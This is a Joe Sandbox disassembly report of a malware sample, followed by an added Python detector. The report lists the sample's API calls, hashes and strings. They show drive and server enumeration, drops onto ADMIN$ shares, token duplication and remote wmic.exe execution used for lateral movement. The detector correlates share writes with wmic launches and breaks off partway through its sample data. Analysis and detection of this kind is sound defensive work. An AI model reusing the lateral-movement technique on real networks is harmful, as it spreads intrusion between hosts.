                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C4E
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C51
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,00000000,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C56
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C59
                                              Similarity
                                              • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                              • String ID:
                                              • API String ID: 1652351593-0
                                              • Opcode ID: 9b3d59394eb45107eddb83d06eb07ee1331278b0f8210b34c1c805e766293ff9
                                              • Instruction ID: 85eab68c7f5e844247e5ff23222235139da4dda3a916bc1056f3b4549e92566c
                                              • Opcode Fuzzy Hash: 9b3d59394eb45107eddb83d06eb07ee1331278b0f8210b34c1c805e766293ff9
                                              • Instruction Fuzzy Hash: 9501F671600715ABD720DFAADC90A5BBBECFF88750F00451AEA8AD7740DA74E9058BA4
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000004,771B0F10,?,00000000,?,?,04BF7B89,000000FF), ref: 04BFA436
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA439
                                              • CreateThread.KERNELBASE(00000000,00000000,04BFA333,00000000,00000000,00000000), ref: 04BFA454
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04BF7B89,000000FF), ref: 04BFA463
                                              • HeapFree.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA466
                                              Similarity
                                              • API ID: Heap$Process$AllocCreateFreeThread
                                              • String ID:
                                              • API String ID: 3966119241-0
                                              • Opcode ID: b3e1dc715f1d17a967ff9547b3f25279d73fc91426e0d57686fe2966dd1ac060
                                              • Instruction ID: 0008cfb47eca793d10f0c01b08741f075482f97f4cb9c88af37eac1165aef1d6
                                              • Opcode Fuzzy Hash: b3e1dc715f1d17a967ff9547b3f25279d73fc91426e0d57686fe2966dd1ac060
                                              • Instruction Fuzzy Hash: 98F030B1500219BFDB10AFE5DC8CD9FBFACEB89794B10446AF60A93200D5789D04CAB0
                                              APIs
                                              • GetLogicalDrives.KERNELBASE ref: 04BF637A
                                              • GetDriveTypeW.KERNELBASE(?), ref: 04BF63B8
                                              • LocalAlloc.KERNEL32(00000040,00000050), ref: 04BF63C7
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF6299,00000000,00000000,00000000), ref: 04BF6404
                                              Similarity
                                              • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                              • String ID:
                                              • API String ID: 2320387513-0
                                              • Opcode ID: 8a09c31f6474d632f4ad09856da87b8df1c7cbeff50e709b0ece0ddf0975e41a
                                              • Instruction ID: 28270ca953f3b5692467c975cc6aea911ec8af08f9d2aa14d97440b78e85079b
                                              • Opcode Fuzzy Hash: 8a09c31f6474d632f4ad09856da87b8df1c7cbeff50e709b0ece0ddf0975e41a
                                              • Instruction Fuzzy Hash: 50119A75A00204AFDB00DF98DC45EAEB7B5FF88710F51C45AEA09EB291D730AA46CB60
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BFA18B
                                              • HeapFree.KERNEL32(00000000), ref: 04BFA194
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BFA199
                                              • HeapFree.KERNEL32(00000000), ref: 04BFA19C
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 0e2c91ee107b4329c3dbb506f7c247df65b6b61675f29455aab056b7bbc9f67b
                                              • Instruction ID: 99f43dae54d0f16cbcccef1cf29ae206f07fc6033663cdd74de644ee4c372a94
                                              • Opcode Fuzzy Hash: 0e2c91ee107b4329c3dbb506f7c247df65b6b61675f29455aab056b7bbc9f67b
                                              • Instruction Fuzzy Hash: 1C1182766003156BE714AA69AC40F2B779CEB89760F050565FF0CD3240D724FE19CAF1
                                              APIs
                                                • Part of subcall function 04BF7E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04BF7EA6,?), ref: 04BF7E7C
                                              • PathFileExistsW.KERNELBASE(?,?), ref: 04BF7EB1
                                              • GetCurrentProcess.KERNEL32(?,?), ref: 04BF7EC3
                                                • Part of subcall function 04BF6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04BF7170,00000000,?,04BF7AF8), ref: 04BF6F8E
                                                • Part of subcall function 04BF6F7C: GetProcAddress.KERNEL32(00000000), ref: 04BF6F95
                                                • Part of subcall function 04BF8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04BF832A
                                                • Part of subcall function 04BF8313: LoadResource.KERNEL32(00000000), ref: 04BF8341
                                                • Part of subcall function 04BF8313: LockResource.KERNEL32(00000000), ref: 04BF8350
                                                • Part of subcall function 04BF8313: SizeofResource.KERNEL32(00000000), ref: 04BF8368
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04BF8384
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04BF838D
                                                • Part of subcall function 04BF8313: memcpy.MSVCRT ref: 04BF839C
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04BF83B9
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF83BC
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04BF840A
                                                • Part of subcall function 04BF8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF840D
                                                • Part of subcall function 04BF87E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF87FC
                                                • Part of subcall function 04BF87E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8813
                                                • Part of subcall function 04BF87E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8824
                                              • ExitProcess.KERNEL32 ref: 04BF7EFD
                                              Similarity
                                              • API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
                                              • String ID:
                                              • API String ID: 706652641-0
                                              • Opcode ID: 15dff9950b0a56682f79fa90ee6918e43e54813eed70dbc4fa47d3c1adcef61c
                                              • Instruction ID: 82ffd8e457d6322258e495db4ab1723070711e09714b4aca4be8d78c23332627
                                              • Opcode Fuzzy Hash: 15dff9950b0a56682f79fa90ee6918e43e54813eed70dbc4fa47d3c1adcef61c
                                              • Instruction Fuzzy Hash: 8BF0447690051967EF10EBF4DC44EDEB3BDEB08244F4404D2AA09D3540EB35EE1987A0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04BF7201,?,?,?,04BF7AF8), ref: 04BF6FC5
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04BF7201,?,?,?,04BF7AF8), ref: 04BF6FDF
                                              • CloseHandle.KERNEL32(00000000,?,?,04BF7201,?,?,?,04BF7AF8), ref: 04BF6FF0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleWrite
                                              • String ID:
                                              • API String ID: 1065093856-0
                                              • Opcode ID: c86080a6e28b676c5669c4139ef5cdf9c6259b61c551f724f60978492345d8b1
                                              • Instruction ID: 89816e02a9fe55b5cdea4116410e3baa4a9cce641478add1b14a1e143ec608e7
                                              • Opcode Fuzzy Hash: c86080a6e28b676c5669c4139ef5cdf9c6259b61c551f724f60978492345d8b1
                                              • Instruction Fuzzy Hash: 57F0F8312011287AEB305E66EC4CEABBF6CEB56BF1F108112FE0E86190C630D946D6F0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF87FC
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8813
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04BF11BB,?,?), ref: 04BF8824
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                              • String ID:
                                              • API String ID: 3805958096-0
                                              • Opcode ID: 6613e3ce70fc6d4bb08914cc8c3ee7586db1d2cdf7e0a316ed4127445823b070
                                              • Instruction ID: 4ad453489620e1c3ea769e94d8d543dce7f8a32978b6702b672f114b41ff383b
                                              • Opcode Fuzzy Hash: 6613e3ce70fc6d4bb08914cc8c3ee7586db1d2cdf7e0a316ed4127445823b070
                                              • Instruction Fuzzy Hash: 3DF012311010247ADB302E96EC4CEEB7E5CEF467F1B004126FA0D86450D734D945D6F1
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,771AF380,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D46
                                              • LeaveCriticalSection.KERNEL32(?,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D7F
                                              • Sleep.KERNELBASE(00002710,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D97
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeaveSleep
                                              • String ID:
                                              • API String ID: 1566154052-0
                                              • Opcode ID: 6d3f21522d4c3a0fb607ccbd8e387840e28636c37e93fa7046856a2769ccbcc6
                                              • Instruction ID: e4da7b8cffe5fe735a3b1276722ecb3ba0103f145b859165e2121e5fc7d53c17
                                              • Opcode Fuzzy Hash: 6d3f21522d4c3a0fb607ccbd8e387840e28636c37e93fa7046856a2769ccbcc6
                                              • Instruction Fuzzy Hash: 7E01A23D300A028B9B299F19C890E3777B6EFC574430585ACEE0E8B215EB30F85BA651
                                              APIs
                                              • Sleep.KERNELBASE(?), ref: 04BFA344
                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BFA399
                                              • HeapFree.KERNEL32(00000000), ref: 04BFA3A0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcessSleep
                                              • String ID:
                                              • API String ID: 1803097132-0
                                              • Opcode ID: bf7d9f11e5b7d7fce6c484a5f54366538dc2bd4db63db2dabbdd377a7e9a3b35
                                              • Instruction ID: 4074b23239d3a9eeb31b84329104a8de72082013af1ef4c3c3ff33b4c77a3966
                                              • Opcode Fuzzy Hash: bf7d9f11e5b7d7fce6c484a5f54366538dc2bd4db63db2dabbdd377a7e9a3b35
                                              • Instruction Fuzzy Hash: 50014F725143066BE710EEB5DC84EABB7ACEF88314F04096ABA09C3151EB24F919C7A1
                                              APIs
                                              • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 04BF754C
                                              • NetApiBufferFree.NETAPI32(?), ref: 04BF75C9
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BufferEnumFreeServer
                                              • String ID:
                                              • API String ID: 2429717511-0
                                              • Opcode ID: a6210320580c4355f184f1eebe196bbdd128160871c437106696df499a3c3ac2
                                              • Instruction ID: 3fcae9aed23c0cfb91c9b8f4c8a7aeae3cc1bbebf471e63fd925f9c40f7c7931
                                              • Opcode Fuzzy Hash: a6210320580c4355f184f1eebe196bbdd128160871c437106696df499a3c3ac2
                                              • Instruction Fuzzy Hash: 0D2149B6900219EBDF21CF98CC44AEEBB79FB08710F1045D6FA19A6150E770B759DB90
                                              APIs
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04BF7AA3,?,?,000000FF,?,?), ref: 04BF7DF6
                                              • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04BF7AA3,?,?,000000FF,?,?), ref: 04BF7E0F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BufferCountFreeInfoServerTick
                                              • String ID:
                                              • API String ID: 2934114180-0
                                              • Opcode ID: 42a701bf71d35475a302de29a7798407e2ad0bff565b493c84a95ef11998681a
                                              • Instruction ID: 94ed1f8727fb83862c46f525a697009679d591cf37166e683d811376b56d1ef6
                                              • Opcode Fuzzy Hash: 42a701bf71d35475a302de29a7798407e2ad0bff565b493c84a95ef11998681a
                                              • Instruction Fuzzy Hash: 71116A727002099BE724CE69DC85F6EB79EEB80750F1855EAE609CB144DB70ED149750
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6DB5
                                              • LeaveCriticalSection.KERNEL32(?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6E0C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: a6d99754081df198ab854fdc8e80cbe39bd0c88cdc8957e9b8fc04d00e65f1f7
                                              • Instruction ID: c84318a58f00e1e5376a6d5d8871eed9ba93a81a036136f77d6b9b4ab13abb24
                                              • Opcode Fuzzy Hash: a6d99754081df198ab854fdc8e80cbe39bd0c88cdc8957e9b8fc04d00e65f1f7
                                              • Instruction Fuzzy Hash: 72112935700A01AFC725CF6AC884A5AB7F6FF993047044969E94BC7711DB31F91ADA50
                                              APIs
                                              • StrCmpIW.KERNELBASE(00000000,?), ref: 04BF6ABD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c29a06f94d982558a8ee75c5e80d3e79d43dbb1c92be7e011a318f4b53419b9c
                                              • Instruction ID: 2ce40868f0b69fba17ce6c034fe73753c4fde46d0573ebf9941b311594b5f086
                                              • Opcode Fuzzy Hash: c29a06f94d982558a8ee75c5e80d3e79d43dbb1c92be7e011a318f4b53419b9c
                                              • Instruction Fuzzy Hash: 22D05E31154109EEDF115F64DC08BB837A8E710306F04C021BA0E850B0F275D1AEDA90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: malloc
                                              • String ID:
                                              • API String ID: 2803490479-0
                                              • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                              • Instruction ID: 03bb7ee9a102bae6bfeaf316c5b7d2b42696aae6cc1a4b4944c75cb29e37d423
                                              • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                              • Instruction Fuzzy Hash: 60B0123311830E5B9F08EED8ED82C5AB3DCEAA8524B404447FA1C8F140E931F6144658
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF9BA5
                                                • Part of subcall function 04BF88D3: PathFindFileNameW.SHLWAPI(04C07BC8,75A373E0,?,04BF95B2), ref: 04BF88E3
                                              • wsprintfW.USER32 ref: 04BF9BF2
                                              • wsprintfW.USER32 ref: 04BF9C16
                                              • PathFindExtensionW.SHLWAPI(?), ref: 04BF9C22
                                              • wsprintfW.USER32 ref: 04BF9C41
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04BF9C59
                                              • PathFileExistsW.SHLWAPI(?), ref: 04BF9C69
                                              • GetLastError.KERNEL32 ref: 04BF9C73
                                              • GetLastError.KERNEL32(?), ref: 04BF9C9A
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF9CDD
                                              • GetCurrentThread.KERNEL32 ref: 04BF9D1B
                                              • OpenThreadToken.ADVAPI32(00000000), ref: 04BF9D22
                                              • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04BF9D3C
                                              • memset.MSVCRT ref: 04BF9D62
                                              • GetSystemDirectoryW.KERNEL32 ref: 04BF9D8A
                                              • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04BF9DAA
                                              • PathFileExistsW.SHLWAPI(?), ref: 04BF9DB7
                                              • wsprintfW.USER32 ref: 04BF9DD8
                                              • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04BF9E24
                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?,00000104), ref: 04BF9E2C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04BF9E3B
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 04BF9E4B
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E59
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E63
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E6D
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E77
                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04BF9E81
                                              • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04BF9E99
                                              • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04BF9EA6
                                              • DeleteFileW.KERNEL32(?), ref: 04BF9EC5
                                              • CloseHandle.KERNEL32(?), ref: 04BF9ED7
                                              • CloseHandle.KERNEL32(?), ref: 04BF9EE4
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,75A373E0,00000000), ref: 04BF68EB
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF68F4
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6921
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,771AE010), ref: 04BF6946
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF6949
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6978
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BF6995
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF6998
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04BF699F
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF69A2
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF9EF9
                                              • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04BF9FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04BF9F17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                              • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                              • API String ID: 659518118-2685502051
                                              • Opcode ID: d52e9641fdc26530df3fdf3f9b30685115a285cb79727e07229cd8b0c0c6bfe4
                                              • Instruction ID: 6480631f9bbe9e123b54ee33178fb763fe00c68460be6734a3968f9ac1ef80d0
                                              • Opcode Fuzzy Hash: d52e9641fdc26530df3fdf3f9b30685115a285cb79727e07229cd8b0c0c6bfe4
                                              • Instruction Fuzzy Hash: 1EB109B1900219EFDF11DFA4DC88AEEBBBDFF44704F1445A6E609A2110D734AA98DF61
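The function above is the lateral-movement routine of this sample: it maps \\%ws\admin$ with WNetAddConnection2W, references a file named cscc.dat on that share, opens and duplicates the current thread token, launches %SystemRoot%\System32\wbem\wmic.exe via CreateProcessAsUserW (with CreateProcessW as the alternative path), waits for it to exit, deletes the file and tears the connection down with WNetCancelConnection2W. Because the dropped file is deleted as soon as wmic.exe returns, disk artefacts are short-lived; the durable signals are the share write on the target and the process creation on the source. The following detector is an added example written for this report, not code from the sample or from Joe Sandbox. It correlates a Security 5145 write into ADMIN$ with a Sysmon Event ID 1 for wmic.exe spawned by rundll32.exe (the sample runs inside rundll32.exe, see the snapshot name above). The events, the host-to-IP inventory (HOST_IPS) and the 60-second window are constructed assumptions; the field names follow the real 5145 and Sysmon 1 schemas.

```python
"""Correlate an ADMIN$ file drop with a rundll32-spawned wmic.exe (added example)."""
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed: wmic.exe follows the share write quickly

# Assumed inventory (constructed): 5145 carries only the client IP, Sysmon 1
# only the host name, so correlating the two needs a host-to-address lookup.
HOST_IPS = {"WS01": "10.0.0.5", "SRV01": "10.0.0.20"}


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def is_admin_share_write(ev):
    """Security 5145: remote write access into \\\\*\\ADMIN$ (the target's C:\\Windows)."""
    if ev.get("EventID") != 5145:
        return False
    try:
        mask = int(ev.get("AccessMask", "0x0"), 16)
    except ValueError:
        return False
    # 0x2 = FILE_WRITE_DATA / FILE_ADD_FILE; ignore read-only share traversal
    return ev.get("ShareName", "").upper().endswith("\\ADMIN$") and bool(mask & 0x2)


def is_wmic_from_rundll32(ev):
    """Sysmon 1: wbem\\wmic.exe whose parent is rundll32.exe."""
    if ev.get("EventID") != 1:
        return False
    return (ev.get("Image", "").lower().endswith("\\wbem\\wmic.exe")
            and ev.get("ParentImage", "").lower().endswith("\\rundll32.exe"))


def detect(events):
    """Return alert tuples; a 'lateral_movement_chain' links a share drop from
    host A with a wmic.exe launch on host A inside WINDOW."""
    alerts, drops = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_admin_share_write(ev):
            drops.append(ev)
            alerts.append(("admin_share_write", ev["Computer"], ev["IpAddress"],
                           ev["RelativeTargetName"]))
        elif is_wmic_from_rundll32(ev):
            alerts.append(("wmic_from_rundll32", ev["Computer"], ev["ParentImage"]))
            src_ip = HOST_IPS.get(ev["Computer"])
            for d in drops:
                if d["IpAddress"] == src_ip and timedelta(0) <= ev["time"] - d["time"] <= WINDOW:
                    alerts.append(("lateral_movement_chain", ev["Computer"],
                                   d["Computer"], d["RelativeTargetName"]))
    return alerts


# Constructed sample telemetry: WS01 (10.0.0.5) drops cscc.dat on SRV01's ADMIN$,
# then rundll32 on WS01 spawns wmic.exe. The later cmd.exe-launched wmic and the
# later lone ADMIN$ write are benign admin activity and must not form a chain.
SAMPLE_EVENTS = [
    {"EventID": 5145, "time": ts("2024-07-24 10:00:00"), "Computer": "SRV01",
     "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\ADMIN$",
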